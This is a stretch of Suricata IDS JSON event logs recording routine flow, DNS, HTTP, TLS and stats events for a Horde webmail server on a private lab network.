{"timestamp":"2020-02-29T00:21:23.001653+0000","flow_id":1056805396477246,"event_type":"flow","src_ip":"192.168.10.81","src_port":52928,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":4,"pkts_toclient":2,"bytes_toserver":272,"bytes_toclient":140,"start":"2020-02-29T00:20:16.980286+0000","end":"2020-02-29T00:20:22.782309+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"13","tcp_flags_ts":"13","tcp_flags_tc":"13","syn":true,"fin":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:27.000286+0000","flow_id":600409286444339,"event_type":"flow","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":28,"pkts_toclient":28,"bytes_toserver":5065,"bytes_toclient":22432,"start":"2020-02-29T00:20:13.591155+0000","end":"2020-02-29T00:20:26.906913+0000","age":13,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:29.000441+0000","flow_id":1047128820218052,"event_type":"flow","src_ip":"192.168.10.122","src_port":60209,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:28.391364+0000","end":"2020-02-29T00:16:28.496615+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:21:30.000158+0000","event_type":"stats","stats":{"uptime":14942,"capture":{"kernel_packets":137592,"kernel_drops":0},"decoder":{"pkts":137604,"bytes":94290019,"invalid":193,"ipv4":136049,"ipv6":10,"ethernet":137604,"raw":0,"null":0,"sll":0,"tcp":130535,"udp":5306,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2846,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2862,"synack":2853,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1881,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2428,"failed_udp":114},"tx":{"http":4829,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2510}},"flow_mgr":{"closed_pruned":2825,"new_pruned":17,"est_pruned":2482,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19839,"memcap_state":0,"memcap_global":0},"http":{"memuse":19014,"memcap":0}}} 
{"timestamp":"2020-02-29T00:21:31.925724+0000","flow_id":1107327101640732,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41965,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":45535,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:21:32.037252+0000","flow_id":1107327101640732,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41965,"proto":"UDP","dns":{"type":"answer","id":45535,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:21:32.037252+0000","flow_id":1107327101640732,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41965,"proto":"UDP","dns":{"type":"answer","id":45535,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:21:32.193317+0000","flow_id":2063545735567906,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34902,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7394}} {"timestamp":"2020-02-29T00:21:33.000202+0000","flow_id":291687022764127,"event_type":"flow","src_ip":"192.168.10.122","src_port":50780,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:32.237663+0000","end":"2020-02-29T00:16:32.345816+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:21:33.000372+0000","flow_id":1852138835688518,"event_type":"flow","src_ip":"192.168.10.122","src_port":50103,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:32.015430+0000","end":"2020-02-29T00:16:32.120707+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:36.986166+0000","flow_id":2063545735567906,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34902,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7394},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":36206,"tx_id":0}} {"timestamp":"2020-02-29T00:21:36.998071+0000","flow_id":536109336509111,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38791,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":16560,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:21:37.000143+0000","event_type":"stats","stats":{"uptime":14949,"capture":{"kernel_packets":137612,"kernel_drops":0},"decoder":{"pkts":137625,"bytes":94299770,"invalid":193,"ipv4":136070,"ipv6":10,"ethernet":137625,"raw":0,"null":0,"sll":0,"tcp":130554,"udp":5308,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2847,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2863,"synack":2854,"rst":1208,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1882,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2429,"failed_udp":114},"tx":{"http":4830,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2511}},"flow_mgr":{"closed_pruned":2825,"new_pruned":17,"est_pruned":2485,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19767,"memcap_state":0,"memcap_global":0},"http":{"memuse":70212,"memcap":0}}} 
{"timestamp":"2020-02-29T00:21:37.000381+0000","flow_id":996559891170365,"event_type":"flow","src_ip":"192.168.10.81","src_port":52934,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1415,"bytes_toclient":6318,"start":"2020-02-29T00:20:31.623677+0000","end":"2020-02-29T00:20:36.894135+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:37.106785+0000","flow_id":536109336509111,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38791,"proto":"UDP","dns":{"type":"answer","id":16560,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:21:37.106785+0000","flow_id":536109336509111,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38791,"proto":"UDP","dns":{"type":"answer","id":16560,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:21:37.153346+0000","flow_id":2063545735567906,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34902,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/login.php?horde_logout_token=zwiFi46-w1WbjcxymnmTfV7&logout_reason=4","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3344}} 
{"timestamp":"2020-02-29T00:21:38.000477+0000","flow_id":726707095974901,"event_type":"flow","src_ip":"192.168.10.130","src_port":34894,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":5,"pkts_toclient":4,"bytes_toserver":338,"bytes_toclient":912,"start":"2020-02-29T00:20:31.832501+0000","end":"2020-02-29T00:20:37.027337+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"13","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:39.000350+0000","flow_id":2129426219671760,"event_type":"flow","src_ip":"192.168.10.122","src_port":39052,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:38.401616+0000","end":"2020-02-29T00:16:38.507038+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:42.154621+0000","flow_id":2063545735567906,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34902,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/login.php?horde_logout_token=zwiFi46-w1WbjcxymnmTfV7&logout_reason=4","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3344},"app_proto":"http","fileinfo":{"filename":"\/login.php","state":"CLOSED","stored":false,"size":8575,"tx_id":1}} 
{"timestamp":"2020-02-29T00:21:44.000206+0000","event_type":"stats","stats":{"uptime":14956,"capture":{"kernel_packets":137630,"kernel_drops":0},"decoder":{"pkts":137636,"bytes":94304976,"invalid":193,"ipv4":136081,"ipv6":10,"ethernet":137636,"raw":0,"null":0,"sll":0,"tcp":130563,"udp":5310,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2847,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2863,"synack":2854,"rst":1208,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1882,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2430,"failed_udp":114},"tx":{"http":4831,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2512}},"flow_mgr":{"closed_pruned":2827,"new_pruned":17,"est_pruned":2486,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19508,"memcap_state":0,"memcap_global":0},"http":{"memuse":880,"memcap":0}}} 
{"timestamp":"2020-02-29T00:21:44.207478+0000","flow_id":2145609676489439,"in_iface":"eth0","event_type":"tls","src_ip":"192.168.10.130","src_port":34226,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","tls":{"subject":"CN=mail.spiral.com","issuerdn":"CN=ChangeMe","fingerprint":"4a:cf:f5:f8:ce:55:c7:45:08:c5:21:a0:2d:b6:f5:0f:3c:e0:a3:17","sni":"mail.spiral.com","version":"TLS 1.2","notbefore":"2020-02-28T18:40:24","notafter":"2030-02-25T18:40:24"}} {"timestamp":"2020-02-29T00:21:45.000312+0000","flow_id":446177012569860,"event_type":"flow","src_ip":"192.168.10.81","src_port":52936,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":1459,"bytes_toclient":6323,"start":"2020-02-29T00:20:39.153348+0000","end":"2020-02-29T00:20:44.442845+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:45.000639+0000","flow_id":1224712834032352,"event_type":"flow","src_ip":"192.168.10.122","src_port":33837,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:16:44.041696+0000","end":"2020-02-29T00:16:44.146676+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:45.000742+0000","flow_id":1932166962086260,"event_type":"flow","src_ip":"192.168.10.122","src_port":39917,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:16:44.262516+0000","end":"2020-02-29T00:16:44.370968+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:21:47.000606+0000","flow_id":1207103483610682,"event_type":"flow","src_ip":"192.168.10.130","src_port":34896,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":1149,"bytes_toclient":8456,"start":"2020-02-29T00:20:41.460346+0000","end":"2020-02-29T00:20:46.736491+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:48.000454+0000","flow_id":1731686478885927,"event_type":"flow","src_ip":"192.168.10.122","src_port":53483,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:47.177191+0000","end":"2020-02-29T00:16:47.282104+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:50.000632+0000","flow_id":1781907531591448,"event_type":"flow","src_ip":"192.168.10.122","src_port":45792,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:49.880408+0000","end":"2020-02-29T00:16:49.985303+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:21:51.000375+0000","event_type":"stats","stats":{"uptime":14963,"capture":{"kernel_packets":138419,"kernel_drops":0},"decoder":{"pkts":138443,"bytes":94943524,"invalid":193,"ipv4":136886,"ipv6":10,"ethernet":138443,"raw":0,"null":0,"sll":0,"tcp":131368,"udp":5310,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2853,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2869,"synack":2860,"rst":1208,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1882,"ftp":0,"smtp":0,"tls":767,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2430,"failed_udp":114},"tx":{"http":4831,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2512}},"flow_mgr":{"closed_pruned":2829,"new_pruned":17,"est_pruned":2489,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18186,"memcap_state":0,"memcap_global":0},"http":{"memuse":720,"memcap":0}}} 
{"timestamp":"2020-02-29T00:21:51.003841+0000","flow_id":1807681630395421,"event_type":"flow","src_ip":"192.168.10.122","src_port":57626,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:50.089117+0000","end":"2020-02-29T00:16:50.197597+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:51.889868+0000","flow_id":2032669216969740,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33731,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":9266,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:21:52.001579+0000","flow_id":2032669216969740,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33731,"proto":"UDP","dns":{"type":"answer","id":9266,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:21:52.001579+0000","flow_id":2032669216969740,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33731,"proto":"UDP","dns":{"type":"answer","id":9266,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:21:52.125095+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52948,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8987}} {"timestamp":"2020-02-29T00:21:52.169203+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52948,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8987},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":37371,"tx_id":0}} {"timestamp":"2020-02-29T00:21:52.174073+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52948,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/form_sections.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} {"timestamp":"2020-02-29T00:21:52.172534+0000","flow_id":2139845830940751,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52950,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/keynavlist.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 
(X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2499}} {"timestamp":"2020-02-29T00:21:52.182051+0000","flow_id":2139845830940751,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52950,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/keynavlist.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2499},"app_proto":"http","fileinfo":{"filename":"\/js\/keynavlist.js","state":"CLOSED","stored":false,"size":8737,"tx_id":0}} {"timestamp":"2020-02-29T00:21:52.182282+0000","flow_id":2139845830940751,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52950,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/liquidmetal.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1403}} 
{"timestamp":"2020-02-29T00:21:52.177953+0000","flow_id":2218856049239313,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52948,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/form_sections.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/js\/form_sections.js","state":"CLOSED","stored":false,"size":1723,"tx_id":1}} {"timestamp":"2020-02-29T00:21:52.191682+0000","flow_id":2139845830940751,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52950,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/liquidmetal.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1403},"app_proto":"http","fileinfo":{"filename":"\/js\/liquidmetal.js","state":"CLOSED","stored":false,"size":3834,"tx_id":1}} 
